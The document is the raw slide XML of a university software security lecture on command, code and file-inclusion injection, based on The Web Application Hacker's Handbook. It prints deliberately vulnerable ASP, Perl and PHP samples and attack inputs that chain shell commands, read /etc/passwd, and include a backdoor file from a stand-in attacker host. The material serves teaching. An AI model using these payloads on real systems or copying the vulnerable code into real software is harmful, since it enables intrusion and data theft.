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2" r:id="rId4"/>
    <p:sldId id="284" r:id="rId5"/>
    <p:sldId id="331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2" r:id="rId19"/>
    <p:sldId id="31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3/21/11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oslab.nccu.edu.tw/Cours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Software Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Lecture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853130"/>
            <a:ext cx="3273552" cy="9379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Fang Yu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dept. of MIS, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>National </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Chengchi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> University</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spring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7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510" y="211803"/>
            <a:ext cx="4946602" cy="4105275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inject code: (cat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10" y="678408"/>
            <a:ext cx="6644981" cy="318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509" y="997003"/>
            <a:ext cx="5873713" cy="56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4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158" y="685800"/>
            <a:ext cx="6220080" cy="886968"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OS Command: Injecting via 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933" y="2020888"/>
            <a:ext cx="6096669" cy="4105275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consider an ASP code that allows administrators to view the contents of a requested log file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>type the log file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>executes the command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4083" y="4045897"/>
            <a:ext cx="8419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&lt;% </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Server.CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“WSCRIPT.SHELL”) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oFileSys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Server.CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Scripting.FileSystemObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>szCMD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>type c:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>inetpub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>wwwroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>\logs\“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>.Form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>FileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>”) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>szTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = “C:\“ &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oFileSys.GetTempName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oScript.Run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(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /c “ &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>szCMD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp; “ &gt; “ &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>szTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, True) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>oFileSys.OpenTextFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>szTempFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 1, False, 0) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142251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681" y="350963"/>
            <a:ext cx="6486968" cy="4105275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When used as intended: (submit last5.log)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81" y="1342818"/>
            <a:ext cx="7074014" cy="49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365" y="313112"/>
            <a:ext cx="6253237" cy="5813052"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use &amp;&amp; to batch multiple commands together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Last5.log &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> c:\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65" y="1342525"/>
            <a:ext cx="6738491" cy="47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Execution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PHP function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() is used to dynamically execute code that is passed to the function at runtime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consider a search function that enables users to create stored searches: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server side implementation: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>creating a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> variable with the value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wahh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2550" y="38163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wahh-app.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search.php?storedsearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=\$mysearch%3dwahh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03602" y="58029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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>storedsearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = $_GET[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>storedsearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>storedsearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;”);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0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execution in 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2227"/>
            <a:ext cx="4946602" cy="4105275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The semicolon character can be used to batch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>commands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>together in a single parameter.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to retrieve the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>file /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/password, you could use either the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>file_get_contentsor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the system command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4371836"/>
            <a:ext cx="539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wahh-app.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search.php?storedsearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=\$mysearch%3dwahh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%20echo%20file_get_contents(‘/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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’) </a:t>
            </a:r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wahh-app.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search.php?storedsearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=\$mysearch%3dwahh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%20system(‘cat%20/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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177137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Inclusion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an application that delivers different content to people in different locations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A request looks like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The application processes as follows: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3529996"/>
            <a:ext cx="5942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wahh-app.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>main.php?Country</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=US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46539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$country = $_GET[‘Country’]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>include( $country . ‘.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ ); </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174347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Inclusion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 the request has been intercepted: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sever side may include an arbitrary remote file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2647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wahh-app.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>main.php?Country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wahh-attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/backdoor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47931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$country = $_GET[‘Country’]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>include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wahh-attacker.com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backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ ); </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404180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main cause of injection vulnerabilities?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How to prevent injection vulnerabilities?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Let’s talk a little bit about Stranger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7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will have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Juilette</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> presenting Attacking Session Management (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Chapter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>7), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Jorina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> presenting Attacking Access Controls (Chapter 8)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We will also have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Hsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Hunag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> presenting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, a tool set for analyzing and attacking web applications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Today </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>we will have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Adam presenting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attack authentications (Ch6)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Before his presentation, I will continue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Injections </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Ch9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>), and also I will present my recent research on how to prevent and remove injection vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The rest of your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>presentations have been  scheduled. Please check the course web page and plan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ahead. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Let me know if you have any question. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The course website :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://soslab.nccu.edu.tw/Courses.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08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Injecting Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>II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853130"/>
            <a:ext cx="3273552" cy="937908"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Chapter 9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Web Application Hacker’s Handbook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8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Interpreted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Languages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Recall that an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>interpreted language is one whose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>execution involved a runtime component </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that interprets the code of the language and carries out the instructions that it contains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For example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>ASP, PHP, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-U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584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Interpreted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Languages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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>most applications, the code processed by the interpreter is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>a mix of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>instructions written by a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>programmer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and data supplied by a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>user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An attacker can supply crafted input that breaks out of the data context, usually by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>supplying some syntax that has a special significance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within the grammar of the interpreted language.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079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Injection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problem: Incorrect or completely lack of validation of user input that results in the execution of commands on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We have discussed SQL injections last week. Today we will discuss OS command, Web scripting language, SOAP and SMTP injection attacks.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command: Injecting via Perl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Perl CGI Code that allows administrators to specify a directory and view a summary of its disk usages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0775" y="319281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#!/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use strict; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use CGI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>qw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(:standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>escapeHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>print header, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>start_html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“”); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0"/>
              <a:t>print “&lt;pre&gt;”; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>my $command = “du -h --exclude </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>* /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/www/html”; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$command= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
